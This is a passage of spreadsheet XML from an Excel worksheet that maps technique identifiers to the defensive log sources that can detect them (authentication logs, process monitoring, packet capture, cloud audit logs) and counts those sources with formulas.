      <c r="G152" s="19"/>
    </row>
    <row r="153" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A153" s="53" t="s">
        <v>195</v>
      </c>
      <c r="B153" s="13" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
      <c r="C153" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D153" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E153" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F153" s="13"/>
      <c r="G153" s="19"/>
    </row>
    <row r="154" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A154" s="53" t="s">
        <v>1220</v>
      </c>
      <c r="B154" s="13" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs</v>
      </c>
      <c r="C154" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D154" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E154" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F154" s="13"/>
      <c r="G154" s="19"/>
    </row>
    <row r="155" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A155" s="55" t="s">
        <v>1226</v>
      </c>
      <c r="B155" s="13" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs</v>
      </c>
      <c r="C155" s="17">
        <v>100</v>
      </c>
      <c r="D155" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E155" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F155" s="13"/>
      <c r="G155" s="19"/>
    </row>
    <row r="156" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A156" s="55" t="s">
        <v>1231</v>
      </c>
      <c r="B156" s="13" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs</v>
      </c>
      <c r="C156" s="17">
        <v>100</v>
      </c>
      <c r="D156" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E156" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F156" s="13"/>
      <c r="G156" s="19"/>
    </row>
    <row r="157" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A157" s="53" t="s">
        <v>1236</v>
      </c>
      <c r="B157" s="13" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C157" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D157" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E157" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F157" s="13"/>
      <c r="G157" s="19"/>
    </row>
    <row r="158" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A158" s="55" t="s">
        <v>200</v>
      </c>
      <c r="B158" s="13" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C158" s="17">
        <v>100</v>
      </c>
      <c r="D158" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E158" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F158" s="13"/>
      <c r="G158" s="19"/>
    </row>
    <row r="159" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A159" s="53" t="s">
        <v>1244</v>
      </c>
      <c r="B159" s="13" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C159" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D159" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E159" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F159" s="13"/>
      <c r="G159" s="19"/>
    </row>
    <row r="160" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A160" s="53" t="s">
        <v>1248</v>
      </c>
      <c r="B160" s="13" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C160" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D160" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E160" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F160" s="13"/>
      <c r="G160" s="19"/>
    </row>
    <row r="161" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A161" s="53" t="s">
        <v>1251</v>
      </c>
      <c r="B161" s="13" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C161" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D161" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E161" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F161" s="13"/>
      <c r="G161" s="19"/>
    </row>
    <row r="162" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A162" s="53" t="s">
        <v>203</v>
      </c>
      <c r="B162" s="13" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C162" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D162" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E162" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F162" s="13"/>
      <c r="G162" s="19"/>
    </row>
    <row r="163" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A163" s="53" t="s">
        <v>205</v>
      </c>
      <c r="B163" s="13" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
      <c r="C163" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D163" s="13">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E163" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F163" s="13"/>
      <c r="G163" s="19"/>
    </row>
    <row r="164" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A164" s="53" t="s">
        <v>207</v>
      </c>
      <c r="B164" s="13" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:C)</f>
        <v>System calls,Loaded DLLs,API monitoring,Process monitoring</v>
      </c>
      <c r="C164" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D164" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E164" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F164" s="13"/>
      <c r="G164" s="19"/>
    </row>
    <row r="165" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A165" s="55" t="s">
        <v>210</v>
      </c>
      <c r="B165" s="13" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
      <c r="C165" s="17">
        <v>0</v>
      </c>
      <c r="D165" s="13">
        <f t="shared" si="5"/>
        <v>11</v>
      </c>
      <c r="E165" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F165" s="13"/>
      <c r="G165" s="19"/>
    </row>
    <row r="166" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A166" s="53" t="s">
        <v>214</v>
      </c>
      <c r="B166" s="13" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Authentication logs</v>
      </c>
      <c r="C166" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D166" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E166" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F166" s="13"/>
      <c r="G166" s="19"/>
    </row>
    <row r="167" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A167" s="53" t="s">
        <v>1279</v>
      </c>
      <c r="B167" s="13" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Office 365 account logs</v>
      </c>
      <c r="C167" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D167" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E167" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F167" s="13"/>
      <c r="G167" s="19"/>
    </row>
    <row r="168" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A168" s="55" t="s">
        <v>1285</v>
      </c>
      <c r="B168" s="13" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Office 365 account logs</v>
      </c>
      <c r="C168" s="17">
        <v>100</v>
      </c>
      <c r="D168" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E168" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F168" s="13"/>
      <c r="G168" s="19"/>
    </row>
    <row r="169" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A169" s="53" t="s">
        <v>1290</v>
      </c>
      <c r="B169" s="13" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Office 365 account logs</v>
      </c>
      <c r="C169" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D169" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E169" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F169" s="13"/>
      <c r="G169" s="19"/>
    </row>
    <row r="170" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A170" s="55" t="s">
        <v>1294</v>
      </c>
      <c r="B170" s="13" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Office 365 account logs</v>
      </c>
      <c r="C170" s="17">
        <v>100</v>
      </c>
      <c r="D170" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E170" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F170" s="13"/>
      <c r="G170" s="19"/>
    </row>
    <row r="171" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A171" s="53" t="s">
        <v>215</v>
      </c>
      <c r="B171" s="13" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Kernel drivers</v>
      </c>
      <c r="C171" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D171" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E171" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F171" s="13"/>
      <c r="G171" s="19"/>
    </row>
    <row r="172" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A172" s="53" t="s">
        <v>216</v>
      </c>
      <c r="B172" s="13" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C172" s="17" t="s">
        <v>252</v>
      </c>
      <c r="D172" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E172" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F172" s="13"/>
      <c r="G172" s="19"/>
    </row>
    <row r="173" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A173" s="53" t="s">
        <v>218</v>
      </c>
      <c r="B173" s="13" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C173" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D173" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E173" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F173" s="13"/>
      <c r="G173" s="19"/>
    </row>
    <row r="174" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A174" s="53" t="s">
        <v>220</v>
      </c>
      <c r="B174" s="13" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:C)</f>
        <v>Office 365 trace logs,Mail server,Email gateway,Authentication logs,File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C174" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D174" s="13">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E174" s="13">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F174" s="13"/>
      <c r="G174" s="19"/>
    </row>
    <row r="175" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A175" s="53" t="s">
        <v>1313</v>
      </c>
      <c r="B175" s="13" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Authentication logs,Mail server</v>
      </c>
      <c r="C175" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D175" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E175" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F175" s="13"/>
      <c r="G175" s="19"/>
    </row>
    <row r="176" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A176" s="53" t="s">
        <v>1318</v>
      </c>
      <c r="B176" s="13" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Email gateway,Mail server,Office 365 trace logs</v>
      </c>
      <c r="C176" s="17" t="s">
        <v>289</v>
      </c>
      <c r="D176" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E176" s="13">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F176" s="13"/>
      <c r="G176" s="19"/>
    </row>
    <row r="177" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A177" s="53" t="s">
        <v>1324</v>
      </c>
      <c r="B177" s="13" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Email gateway,Mail server,Office 365 trace logs</v>
      </c>
      <c r="C177" s="17" t="s">
        <v>291</v>
      </c>
      <c r="D177" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E177" s="13">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F177" s="13"/>
      <c r="G177" s="19"/>
    </row>
    <row r="178" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A178" s="55" t="s">
        <v>222</v>
      </c>
      <c r="B178" s="13" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C178" s="17">
        <v>100</v>
      </c>
      <c r="D178" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E178" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F178" s="13"/>
      <c r="G178" s="19"/>
    </row>
    <row r="179" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A179" s="53" t="s">
        <v>226</v>
      </c>
      <c r="B179" s="13" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention,Process command-line parameters</v>
      </c>
      <c r="C179" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D179" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E179" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F179" s="13"/>
      <c r="G179" s="19"/>
    </row>
    <row r="180" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A180" s="53" t="s">
        <v>227</v>
      </c>
      <c r="B180" s="13" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C180" s="17" t="s">
        <v>296</v>
      </c>
      <c r="D180" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E180" s="13">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F180" s="13"/>
      <c r="G180" s="19"/>
    </row>
    <row r="181" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A181" s="53" t="s">
        <v>231</v>
      </c>
      <c r="B181" s="13" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C181" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D181" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E181" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F181" s="13"/>
      <c r="G181" s="19"/>
    </row>
    <row r="182" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A182" s="53" t="s">
        <v>232</v>
      </c>
      <c r="B182" s="13" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,API monitoring</v>
      </c>
      <c r="C182" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D182" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E182" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F182" s="13"/>
      <c r="G182" s="19"/>
    </row>
    <row r="183" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A183" s="53" t="s">
        <v>1347</v>
      </c>
      <c r="B183" s="13" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
      <c r="C183" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D183" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E183" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F183" s="13"/>
      <c r="G183" s="19"/>
    </row>
    <row r="184" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A184" s="53" t="s">
        <v>236</v>
      </c>
      <c r="B184" s="13" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C184" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D184" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E184" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F184" s="13"/>
      <c r="G184" s="19"/>
    </row>
    <row r="185" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A185" s="55" t="s">
        <v>1356</v>
      </c>
      <c r="B185" s="13" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C185" s="17">
        <v>100</v>
      </c>
      <c r="D185" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E185" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F185" s="13"/>
      <c r="G185" s="19"/>
    </row>
    <row r="186" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A186" s="53" t="s">
        <v>238</v>
      </c>
      <c r="B186" s="13" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
      <c r="C186" s="17" t="s">
        <v>303</v>
      </c>
      <c r="D186" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E186" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F186" s="13"/>
      <c r="G186" s="19"/>
    </row>
    <row r="187" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A187" s="53" t="s">
        <v>242</v>
      </c>
      <c r="B187" s="13" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C187" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D187" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E187" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F187" s="13"/>
      <c r="G187" s="19"/>
    </row>
    <row r="188" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A188" s="53" t="s">
        <v>1366</v>
      </c>
      <c r="B188" s="13" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C188" s="17" t="s">
        <v>306</v>
      </c>
      <c r="D188" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E188" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F188" s="13"/>
      <c r="G188" s="19"/>
    </row>
    <row r="189" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A189" s="53" t="s">
        <v>1369</v>
      </c>
      <c r="B189" s="13" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C189" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D189" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E189" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F189" s="13"/>
      <c r="G189" s="19"/>
    </row>
    <row r="190" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A190" s="55" t="s">
        <v>243</v>
      </c>
      <c r="B190" s="13" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C190" s="17">
        <v>100</v>
      </c>
      <c r="D190" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E190" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F190" s="13"/>
      <c r="G190" s="19"/>
    </row>
    <row r="191" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A191" s="53" t="s">
        <v>244</v>
      </c>
      <c r="B191" s="13" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs,API monitoring,Access tokens,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C191" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D191" s="13">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E191" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F191" s="13"/>
      <c r="G191" s="19"/>
    </row>
    <row r="192" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A192" s="53" t="s">
        <v>1381</v>
      </c>
      <c r="B192" s="13" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Access tokens,API monitoring</v>
      </c>
      <c r="C192" s="17" t="s">
        <v>312</v>
      </c>
      <c r="D192" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E192" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F192" s="13"/>
      <c r="G192" s="19"/>
    </row>
    <row r="193" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A193" s="53" t="s">
        <v>1387</v>
      </c>
      <c r="B193" s="13" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Access tokens,API monitoring</v>
      </c>
      <c r="C193" s="17" t="s">
        <v>314</v>
      </c>
      <c r="D193" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E193" s="13">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F193" s="13"/>
      <c r="G193" s="19"/>
    </row>
    <row r="194" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A194" s="53" t="s">
        <v>1391</v>
      </c>
      <c r="B194" s="13" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Access tokens,API monitoring</v>
      </c>
      <c r="C194" s="17" t="s">
        <v>316</v>
      </c>
      <c r="D194" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E194" s="13">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F194" s="13"/>
      <c r="G194" s="19"/>
    </row>
    <row r="195" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A195" s="53" t="s">
        <v>1395</v>
      </c>
      <c r="B195" s="13" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Windows event logs</v>
      </c>
      <c r="C195" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D195" s="13">
        <f t="shared" ref="D195:D258" si="7">LEN(TRIM(B195))-LEN(SUBSTITUTE(TRIM(B195),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E195" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F195" s="13"/>
      <c r="G195" s="19"/>
    </row>
    <row r="196" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A196" s="53" t="s">
        <v>1401</v>
      </c>
      <c r="B196" s="13" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Authentication logs,API monitoring</v>
      </c>
      <c r="C196" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D196" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E196" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F196" s="13"/>
      <c r="G196" s="19"/>
    </row>
    <row r="197" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A197" s="53" t="s">
        <v>245</v>
      </c>
      <c r="B197" s="13" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</v>
      </c>
      <c r="C197" s="17" t="s">
        <v>320</v>
      </c>
      <c r="D197" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E197" s="13">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F197" s="13"/>
      <c r="G197" s="19"/>
    </row>
    <row r="198" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A198" s="53" t="s">
        <v>246</v>
      </c>
      <c r="B198" s="13" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
      <c r="C198" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D198" s="13">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E198" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F198" s="13"/>
      <c r="G198" s="19"/>
    </row>
    <row r="199" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A199" s="53" t="s">
        <v>1414</v>
      </c>
      <c r="B199" s="13" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
      <c r="C199" s="17" t="s">
        <v>320</v>
      </c>
      <c r="D199" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E199" s="13">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F199" s="13"/>
      <c r="G199" s="19"/>
    </row>
    <row r="200" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A200" s="53" t="s">
        <v>1418</v>
      </c>
      <c r="B200" s="13" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
      <c r="C200" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D200" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E200" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F200" s="13"/>
      <c r="G200" s="19"/>
    </row>
    <row r="201" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A201" s="53" t="s">
        <v>1421</v>
      </c>
      <c r="B201" s="13" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C201" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D201" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E201" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F201" s="13"/>
      <c r="G201" s="19"/>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A202" s="53" t="s">
        <v>248</v>
      </c>
      <c r="B202" s="13" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
      <c r="C202" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D202" s="13">
        <f t="shared" si="7"/>
        <v>5</v>
